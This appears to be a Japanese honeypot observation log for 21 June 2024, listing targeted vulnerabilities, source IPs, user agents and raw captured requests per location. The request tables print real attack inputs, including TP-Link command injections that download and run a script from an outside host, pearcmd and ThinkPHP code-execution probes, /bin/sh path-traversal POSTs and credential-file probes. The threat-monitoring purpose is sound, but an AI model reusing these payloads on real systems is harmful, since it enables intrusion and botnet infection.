2024/06/21 ハニーポット(仮) 観測記録 - コンニチハレバレトシタアオゾラ

ハニーポット(仮) 観測記録 2024/06/21分です。

特徴

共通

TP-Link製品の脆弱性を狙うアクセス
/.envへのスキャン行為

Location:JP

Apache HTTP Serverの脆弱性(CVE-2021-41773)を狙うアクセス
PHPUnitの脆弱性(CVE-2017-9841)を狙うアクセス
Spring Bootの脆弱性を狙うアクセス
ThinkPHPの脆弱性を狙うアクセス
Odinによるスキャン行為
curlによるスキャン行為
.jsへのスキャン行為
/.awsへのスキャン行為
/.gitへのスキャン行為
Apache Solrへのスキャン行為
Apache Tomcatへのスキャン行為

を確認しました。

Location:US

Apache HTTP Serverの脆弱性(CVE-2021-41773)を狙うアクセス
PHPUnitの脆弱性(CVE-2017-9841)を狙うアクセス
Spring Cloud Gatewayの脆弱性(CVE-2022-22947)を狙うアクセス
ThinkPHPの脆弱性を狙うアクセス
CensysInspectによるスキャン行為
Odinによるスキャン行為
curlによるスキャン行為
.jsへのスキャン行為
/.gitへのスキャン行為
Apache Solrへのスキャン行為

を確認しました。

Location:UK

Spring Cloud Gatewayの脆弱性(CVE-2022-22947)を狙うアクセス
CensysInspectによるスキャン行為
/.gitへのスキャン行為
WordPress Pluginへのスキャン行為

を確認しました。

Location:SG

Apache HTTP Serverの脆弱性(CVE-2021-41773)を狙うアクセス
D-link製品の脆弱性を狙うアクセス
PHPUnitの脆弱性(CVE-2017-9841)を狙うアクセス
Spring Cloud Gatewayの脆弱性(CVE-2022-22947)を狙うアクセス
ThinkPHPの脆弱性を狙うアクセス
CensysInspectによるスキャン行為
Nmap Scripting Engineによるスキャン行為
Odinによるスキャン行為
curlによるスキャン行為
.jsへのスキャン行為
Apache Solrへのスキャン行為
WordPress Pluginへのスキャン行為

を確認しました。

他

アクセス数推移

JP：総アクセス数：178 (前日比：51)
US：総アクセス数：233 (前日比：-74)
UK：総アクセス数：102 (前日比：-154)
SG：総アクセス数：244 (前日比：-20)

都合により GET / HTTP/1.1 POST / HTTP/1.1 は除いています。

Location:JP

送信元IPアドレス一覧

件数	送信元IPアドレス	国
2	23.94.8.247	United States
55	43.131.59.56	Singapore
1	45.79.181.104	United States
2	46.101.131.69	United States
1	47.88.5.56	United States
1	64.62.156.14	United States
1	64.62.156.15	United States
1	64.62.156.20	United States
1	64.62.156.22	United States
4	64.226.99.8	United States
1	64.227.34.24	United States
1	94.156.67.234	Bulgaria
12	101.32.192.203	Singapore
43	103.162.36.154	Indonesia
1	104.192.0.61	United States
3	104.248.28.138	United States
1	104.248.43.107	United States
13	134.209.159.222	United States
7	135.125.217.54	France
1	135.125.244.48	France
2	135.125.246.189	France
1	138.68.107.34	United States
2	147.185.132.168	United States
1	154.26.132.60	United States
1	159.65.50.3	United States
1	172.104.11.4	United States
1	185.133.213.86	Myanmar
2	185.191.127.212	Seychelles
6	185.254.196.173	Ukraine
3	185.254.196.186	Ukraine
2	205.210.31.8	United States
2	205.210.31.158	United States
1	207.244.250.144	United States
1	209.38.210.103	United States

UserAgent一覧

件数	UserAgent
18	`-`
43	`Custom-AsyncHttpClient`
8	`Go-http-client/1.1`
1	`Mozilla/5.0 (Linux; Android 10; LIO-AN00 Build/HUAWEILIO-AN00; wv) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.114 Mobile Safari/537.36`
12	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36`
8	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0`
1	`Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) MxBrowser/4.5.10.7000 Chrome/30.0.1551.0 Safari/537.36`
55	`Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.49 Safari/537.36`
22	`Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36`
1	`Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/110.0`
4	`Mozilla/5.0 (compatible; Odin; https[:]//docs[.]getodin[.]com/)`
1	`Mozilla/5.0`
1	`curl/8.1.2`
1	`python-requests/2.22.0`

リクエスト内容一覧

件数	Method	Request	Protocol
1		`\x16\x03\x01\x01$\x01`
1		`\x16\x03\x01\x01\xfa\x01`
15		`\x16\x03\x01`
1		``
1	GET	`/.aws/credentials`	HTTP/1.1
23	GET	`/.env`	HTTP/1.1
1	GET	`/.gitlab-ci.yml`	HTTP/1.1
1	GET	`/1.php`	HTTP/1.1
1	GET	`/HNAP1`	HTTP/1.1
1	GET	`/Public/home/js/check.js`	HTTP/1.1
1	GET	`/V2/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
1	GET	`/_profiler/phpinfo`	HTTP/1.1
1	GET	`/actuator/env`	HTTP/1.1
1	GET	`/admin/test`	HTTP/1.1
1	GET	`/admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
1	GET	`/api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
1	GET	`/app.js`	HTTP/1.1
1	GET	`/app.py`	HTTP/1.1
1	GET	`/app/settings.py`	HTTP/1.1
1	GET	`/app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
1	GET	`/app_dev.php/_profiler/empty/search/results`	HTTP/1.1
1	GET	`/app_dev.php/_profiler/phpinfo`	HTTP/1.1
1	GET	`/application-dev.properties`	HTTP/1.1
1	GET	`/application-prod.yml`	HTTP/1.1
1	GET	`/application.yml`	HTTP/1.1
1	GET	`/apps/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
1	GET	`/appsettings.json`	HTTP/1.1
1	GET	`/assets/environment.json`	HTTP/1.1
1	GET	`/aws.json`	HTTP/1.1
1	GET	`/backup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
1	GET	`/blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
1	GET	`/bundle.js`	HTTP/1.1
1	GET	`/cgi-bin/authLogin.cgi`	HTTP/1.1
2	GET	`/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60wget+http%3A%2F%2F103[.]149[.]28[.]141%2Ft+-O-+\|+sh%60)`	HTTP/1.1
1	GET	`/cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
1	GET	`/crm/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
1	GET	`/dashboard/admin/phpinfo.php`	HTTP/1.1
1	GET	`/dashboard/phpinfo.php`	HTTP/1.1
1	GET	`/demo/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
1	GET	`/dev/phpinfo.php`	HTTP/1.1
1	GET	`/docker-compose.yml`	HTTP/1.1
1	GET	`/env.js`	HTTP/1.1
1	GET	`/env.json`	HTTP/1.1
1	GET	`/env.php`	HTTP/1.1
1	GET	`/env`	HTTP/1.1
1	GET	`/evox/about`	HTTP/1.1
2	GET	`/favicon.ico`	HTTP/1.1
1	GET	`/files/`	HTTP/1.1
1	GET	`/form.html`	HTTP/1.1
1	GET	`/frontend_dev.php/$`	HTTP/1.1
1	GET	`/geoip/`	HTTP/1.1
1	GET	`/geoserver/web/`	HTTP/1.1
1	GET	`/in.php`	HTTP/1.1
1	GET	`/index.html`	HTTP/1.1
1	GET	`/index.php/phpinfo`	HTTP/1.1
1	GET	`/index.php?lang=../../../../../../../../tmp/index1`	HTTP/1.1
1	GET	`/index.php?lang=../../../../../../../../usr/local/lib/php/pearcmd&+config-create+/&/<?echo(md5(\"hi\"));?>+/tmp/index1.php`	HTTP/1.1
1	GET	`/index.php?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello`	HTTP/1.1
1	GET	`/index.php`	HTTP/1.1
2	GET	`/info.php`	HTTP/1.1
1	GET	`/info`	HTTP/1.1
1	GET	`/install/index.php`	HTTP/1.1
1	GET	`/laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
1	GET	`/lib/phpunit/Util/PHP/eval-stdin.php`	HTTP/1.1
1	GET	`/lib/phpunit/phpunit/Util/PHP/eval-stdin.php`	HTTP/1.1
1	GET	`/lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
1	GET	`/lib/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
1	GET	`/lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
1	GET	`/login/index.php`	HTTP/1.1
1	GET	`/manager/html`	HTTP/1.1
1	GET	`/manifest.json`	HTTP/1.1
1	GET	`/odinhttpcall1718852641`	HTTP/1.1
1	GET	`/package.json`	HTTP/1.1
1	GET	`/panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
1	GET	`/password.php`	HTTP/1.1
1	GET	`/php-info.php`	HTTP/1.1
1	GET	`/php.ini`	HTTP/1.1
1	GET	`/php.php`	HTTP/1.1
1	GET	`/php_info.php`	HTTP/1.1
1	GET	`/php_info`	HTTP/1.1
1	GET	`/phpinfo.php`	HTTP/1.1
1	GET	`/phpinfo`	HTTP/1.1
1	GET	`/phpunit/Util/PHP/eval-stdin.php`	HTTP/1.1
1	GET	`/phpunit/phpunit/Util/PHP/eval-stdin.php`	HTTP/1.1
1	GET	`/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
1	GET	`/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
1	GET	`/phpversion.php`	HTTP/1.1
1	GET	`/public/index.php?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello`	HTTP/1.1
1	GET	`/public/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
1	GET	`/query?q=SHOW+DIAGNOSTICS`	HTTP/1.1
1	GET	`/resources.py`	HTTP/1.1
1	GET	`/root/.aws/credentials`	HTTP/1.1
1	GET	`/server.js`	HTTP/1.1
1	GET	`/settings.json`	HTTP/1.1
1	GET	`/settings.py`	HTTP/1.1
1	GET	`/solr/admin/cores?action=STATUS&wt=json`	HTTP/1.1
1	GET	`/solr/admin/info/system`	HTTP/1.1
1	GET	`/src/environments/environment.ts`	HTTP/1.1
1	GET	`/systembc/password.php`	HTTP/1.1
1	GET	`/test.php`	HTTP/1.1
1	GET	`/test/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
1	GET	`/test1.php`	HTTP/1.1
1	GET	`/test2.php`	HTTP/1.1
1	GET	`/test`	HTTP/1.1
1	GET	`/testing/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
1	GET	`/tests/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
1	GET	`/upl.php`	HTTP/1.1
1	GET	`/v3/time`	HTTP/1.1
1	GET	`/vendor/phpunit/Util/PHP/eval-stdin.php`	HTTP/1.1
1	GET	`/vendor/phpunit/phpunit/LICENSE/eval-stdin.php`	HTTP/1.1
1	GET	`/vendor/phpunit/phpunit/Util/PHP/eval-stdin.php`	HTTP/1.1
1	GET	`/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
1	GET	`/vendor/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
1	GET	`/vendor/src/app/app.component.ts`	HTTP/1.1
1	GET	`/vendor/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
1	GET	`/webroot/phpinfo.php`	HTTP/1.1
1	GET	`/webui/`	HTTP/1.1
1	GET	`/workspace/drupal/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
1	GET	`/ws/ec/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
1	GET	`/ws/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
1	GET	`/www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
1	GET	`/yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
1	GET	`/zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
12	HEAD	`/Core/Skin/Login.aspx`	HTTP/1.1
1	OPTIONS	`/`	HTTP/1.1
1	POST	`/cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/bin/sh`	HTTP/1.1
1	POST	`/cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh`	HTTP/1.1
1	POST	`/sdk`	HTTP/1.1

Location:US

送信元IPアドレス一覧

件数	送信元IPアドレス	国
1	13.75.149.32	United States
1	18.201.192.17	United States
1	23.94.8.253	United States
2	35.225.97.26	United States
1	45.79.128.205	United States
1	45.79.181.94	United States
3	45.79.181.104	United States
1	45.79.181.251	United States
12	45.148.10.174	Romania
1	52.76.71.100	United States
1	52.189.75.15	United States
4	54.36.115.221	France
11	57.129.23.166	France
3	65.49.20.67	United States
1	68.183.237.229	United States
2	83.97.73.245	Germany
3	85.204.116.70	Romania
2	91.92.245.67	Bulgaria
1	95.80.116.43	Russia
1	103.153.78.154	Vietnam
1	104.248.43.107	United States
2	104.248.43.162	United States
43	113.133.177.77	China
13	128.199.51.227	United Kingdom
1	134.209.24.244	United States
1	138.68.103.96	United States
1	139.59.101.104	Singapore
1	139.59.154.62	Singapore
2	141.98.11.79	Lithuania
2	143.198.204.194	United States
2	147.185.132.76	United States
2	157.230.37.129	United States
2	157.230.45.135	United States
1	157.245.218.195	United States
1	157.254.164.49	United States
4	159.89.27.136	United States
4	165.22.54.194	United States
4	167.71.201.103	United States
2	167.71.201.139	United States
4	167.71.202.190	United States
2	167.71.207.184	United States
2	172.105.128.13	United States
43	175.6.65.243	China
1	178.62.66.171	United States
20	185.191.127.212	Seychelles
2	185.224.3.4	Turkey
1	194.165.16.76	Panama
2	198.235.24.12	United States
2	198.235.24.204	United States
2	199.45.154.131	United States
2	199.45.155.66	United States
2	199.45.155.78	United States
2	205.210.31.8	United States
2	205.234.144.12	United States
1	207.167.66.182	United States
1	216.218.206.68	United States

UserAgent一覧

件数	UserAgent
43	`-`
89	`Custom-AsyncHttpClient`
40	`Go-http-client/1.1`
3	`Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0`
2	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36`
8	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36`
2	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0`
1	`Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0`
20	`Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36`
1	`Mozilla/5.0 (X11; Linux x86_64; rv:73.0) Gecko/20100101 Firefox/73.0`
3	`Mozilla/5.0 (compatible; CensysInspect/1.1; +https[:]//about[.]censys[.]io/)`
4	`Mozilla/5.0 (compatible; Odin; https[:]//docs[.]getodin[.]com/)`
13	`Mozilla/5.0`
1	`curl/8.1.2`
1	`python-requests/2.25.1`

リクエスト内容一覧

件数	Method	Request	Protocol
1		`MGLNDD_34.68.118.83_80\n`
1		`\x03`
1		`\x16\x03\x01\x01$\x01`
1		`\x16\x03\x01\x01\x03\x01`
12		`\x16\x03\x01\x01\x07\x01`
1		`\x16\x03\x01\x01\xfb\x01`
20		`\x16\x03\x01`
1		``
1	CONNECT	`api6[.]ipify[.]org:443`	HTTP/1.1
1	CONNECT	`api[.]ipify[.]org:443`	HTTP/1.1
2	CONNECT	`google[.]com:443`	HTTP/1.1
1	CONNECT	`pro.ip-api[.]com:443`	HTTP/1.1
1	CONNECT	`www[.]google[.]com:443`	HTTP/1.1
23	GET	`/.env`	HTTP/1.1
1	GET	`/.git/config`	HTTP/1.1
1	GET	`/1.php`	HTTP/1.1
1	GET	`/?XDEBUG_SESSION_START=phpstorm`	HTTP/1.1
1	GET	`/HNAP1`	HTTP/1.1
2	GET	`/V2/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
1	GET	`/actuator/gateway/routes`	HTTP/1.1
2	GET	`/admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
2	GET	`/api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
2	GET	`/app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
2	GET	`/apps/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
2	GET	`/backup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
2	GET	`/blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
1	GET	`/bundle.js`	HTTP/1.1
12	GET	`/cdn-cgi/trace`	HTTP/1.1
1	GET	`/cgi-bin/authLogin.cgi`	HTTP/1.1
6	GET	`/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F45[.]148[.]10[.]78%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60)`	HTTP/1.1
6	GET	`/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60for+proc_dir+in+%2Fproc%2F%5B0-9%5D%2A%3B+do+pid%3D%24%7Bproc_dir%23%23%2A%2F%7D%3B+buffer%3D%24%28cat+%22%2Fproc%2F%24pid%2Fmaps%22%29%3B+if+%5B+%22%24%7B%23buffer%7D%22+-gt+1+%5D%3B+then+if+%5B+%22%24%7Bbuffer%23%2A%22%2Flib%2F%22%7D%22+%3D+%22%24buffer%22+%5D+%26%26+%5B+%22%24%7Bbuffer%23%2A%22telnetdbot%22%7D%22+%3D+%22%24buffer%22+%5D%3B+then+kill+-9+%22%24pid%22%3B+fi%3B+fi%3B+done%60)`	HTTP/1.1
20	GET	`/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60wget+http%3A%2F%2F103[.]149[.]28[.]141%2Ft+-O-+\|+sh%60)`	HTTP/1.1
2	GET	`/cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
2	GET	`/crm/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
2	GET	`/demo/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
1	GET	`/evox/about`	HTTP/1.1
7	GET	`/favicon.ico`	HTTP/1.1
1	GET	`/files/`	HTTP/1.1
1	GET	`/form.html`	HTTP/1.1
1	GET	`/geoip/`	HTTP/1.1
1	GET	`/geoserver/web/`	HTTP/1.1
2	GET	`/index.php?lang=../../../../../../../../tmp/index1`	HTTP/1.1
2	GET	`/index.php?lang=../../../../../../../../usr/local/lib/php/pearcmd&+config-create+/&/<?echo(md5(\"hi\"));?>+/tmp/index1.php`	HTTP/1.1
2	GET	`/index.php?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello`	HTTP/1.1
1	GET	`/info.php`	HTTP/1.1
2	GET	`/laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
2	GET	`/lib/phpunit/Util/PHP/eval-stdin.php`	HTTP/1.1
2	GET	`/lib/phpunit/phpunit/Util/PHP/eval-stdin.php`	HTTP/1.1
2	GET	`/lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
2	GET	`/lib/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
2	GET	`/lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
1	GET	`/odinhttpcall1718883945`	HTTP/1.1
2	GET	`/panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
1	GET	`/password.php`	HTTP/1.1
2	GET	`/phpunit/Util/PHP/eval-stdin.php`	HTTP/1.1
2	GET	`/phpunit/phpunit/Util/PHP/eval-stdin.php`	HTTP/1.1
2	GET	`/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
2	GET	`/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
2	GET	`/public/index.php?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello`	HTTP/1.1
2	GET	`/public/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
1	GET	`/query?q=SHOW+DIAGNOSTICS`	HTTP/1.1
1	GET	`/solr/admin/cores?action=STATUS&wt=json`	HTTP/1.1
1	GET	`/solr/admin/info/system`	HTTP/1.1
1	GET	`/systembc/password.php`	HTTP/1.1
2	GET	`/test/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
2	GET	`/testing/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
2	GET	`/tests/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
1	GET	`/upl.php`	HTTP/1.1
2	GET	`/vendor/phpunit/Util/PHP/eval-stdin.php`	HTTP/1.1
2	GET	`/vendor/phpunit/phpunit/LICENSE/eval-stdin.php`	HTTP/1.1
2	GET	`/vendor/phpunit/phpunit/Util/PHP/eval-stdin.php`	HTTP/1.1
3	GET	`/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
2	GET	`/vendor/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
2	GET	`/vendor/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
1	GET	`/webui/`	HTTP/1.1
2	GET	`/workspace/drupal/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
2	GET	`/ws/ec/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
2	GET	`/ws/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
2	GET	`/www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
2	GET	`/yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
2	GET	`/zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
3	POST	`/cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/bin/sh`	HTTP/1.1
3	POST	`/cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh`	HTTP/1.1
1	POST	`/onvif/device_service`	HTTP/1.1
1	POST	`/sdk`	HTTP/1.1
3	PRI	`*`	HTTP/2.0

Location:UK

送信元IPアドレス一覧

件数	送信元IPアドレス	国
2	5.8.11.202	Russia
1	5.196.102.78	France
1	45.79.172.21	United States
2	45.84.89.2	Bulgaria
12	45.148.10.174	Romania
10	54.36.115.221	France
3	57.129.23.166	France
1	65.49.1.119	United States
2	71.6.134.232	United States
2	78.153.140.222	Russia
2	83.97.73.245	Germany
1	91.92.242.17	Bulgaria
1	91.92.246.103	Bulgaria
1	94.156.67.234	Bulgaria
2	101.36.97.88	Hong Kong
1	104.28.247.220	United States
1	134.209.251.21	United States
1	139.59.101.104	Singapore
2	141.98.11.79	Lithuania
1	157.254.164.21	United States
1	165.232.34.217	United States
2	167.71.201.139	United States
4	167.71.202.190	United States
2	167.94.146.50	United States
1	167.99.123.174	United States
1	172.104.11.4	United States
2	172.104.11.34	United States
1	172.105.128.11	United States
1	172.105.128.12	United States
4	185.165.191.27	Seychelles
1	185.180.140.4	Portugal
20	185.191.127.212	Seychelles
1	188.166.156.42	United States
1	192.99.7.195	Canada
1	192.155.90.220	United States
2	198.235.24.25	United States
2	199.45.154.145	United States
2	205.210.31.178	United States
1	207.167.66.182	United States
3	216.218.206.66	United States

UserAgent一覧

件数	UserAgent
28	`-`
38	`Go-http-client/1.1`
1	`Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0`
1	`Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0 Safari/605.1.15`
1	`Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 YaBrowser/24.1.0.0 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.0.0 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.142 Safari/537.36 OPR/62.0.3331.116`
2	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 6.1; WOW64; rv:54.0) Gecko/20100101 Firefox/54.0`
1	`Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3269.3 Safari/537.36`
14	`Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36`
1	`Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/120.0.6099.28 Safari/537.36`
1	`Mozilla/5.0 (X11; Linux x86_64; rv:73.0) Gecko/20100101 Firefox/73.0`
1	`Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0`
2	`Mozilla/5.0 (compatible; CensysInspect/1.1; +https[:]//about[.]censys[.]io/)`
6	`Mozilla/5.0`

リクエスト内容一覧

件数	Method	Request	Protocol
1		`\x16\x03\x01\x01H\x01`
3		`\x16\x03\x01\x01\x07\x01`
1		`\x16\x03\x01\x01\xfc\x01`
16		`\x16\x03\x01`
1		``
2	CONNECT	`google[.]com:443`	HTTP/1.1
1	CONNECT	`www[.]google[.]com:443`	HTTP/1.1
16	GET	`/.env`	HTTP/1.1
2	GET	`/.git/config`	HTTP/1.1
1	GET	`/.well-known/security.txt`	HTTP/1.1
1	GET	`/?XDEBUG_SESSION_START=phpstorm`	HTTP/1.1
1	GET	`/actuator/gateway/routes`	HTTP/1.1
6	GET	`/cdn-cgi/trace`	HTTP/1.1
6	GET	`/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F45[.]148[.]10[.]78%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60)`	HTTP/1.1
6	GET	`/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60for+proc_dir+in+%2Fproc%2F%5B0-9%5D%2A%3B+do+pid%3D%24%7Bproc_dir%23%23%2A%2F%7D%3B+buffer%3D%24%28cat+%22%2Fproc%2F%24pid%2Fmaps%22%29%3B+if+%5B+%22%24%7B%23buffer%7D%22+-gt+1+%5D%3B+then+if+%5B+%22%24%7Bbuffer%23%2A%22%2Flib%2F%22%7D%22+%3D+%22%24buffer%22+%5D+%26%26+%5B+%22%24%7Bbuffer%23%2A%22telnetdbot%22%7D%22+%3D+%22%24buffer%22+%5D%3B+then+kill+-9+%22%24pid%22%3B+fi%3B+fi%3B+done%60)`	HTTP/1.1
20	GET	`/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60wget+http%3A%2F%2F103[.]149[.]28[.]141%2Ft+-O-+\|+sh%60)`	HTTP/1.1
7	GET	`/favicon.ico`	HTTP/1.1
1	GET	`/geoserver/web/`	HTTP/1.1
1	GET	`/robots.txt`	HTTP/1.1
2	GET	`/server-status`	HTTP/1.1
